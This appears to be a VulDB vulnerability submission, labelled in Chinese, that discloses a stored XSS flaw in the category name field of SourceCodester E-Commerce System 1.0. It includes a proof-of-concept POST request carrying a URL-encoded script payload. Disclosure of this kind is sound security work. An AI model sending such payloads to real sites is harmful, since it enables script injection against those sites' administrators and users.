| 标题 | E-Commerce System category XSS |
|---|
| 描述 | E-Commerce System has a XSS vulnerability at /ecommerce/admin/category/controller.php,attackers can edit the category name with a xss payload , and it will be triggered when viewing the page /ecommerce/admin/category/index.php.
POC request below:
POST /ecommerce/admin/category/controller.php?action=edit HTTP/1.1
********************************
CATEGID=5&CATEGORY=SHOES%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E&save= |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| 用户 | WWesleywww (UID 43117) |
|---|
| 提交 | 2023-03-20 07時59分 (3 年前) |
|---|
| 管理 | 2023-03-20 08時33分 (34 minutes later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 223411 [SourceCodester E-Commerce System 1.0 Category Name controller.php 类别 跨网站脚本] |
|---|
| 积分 | 19 |
|---|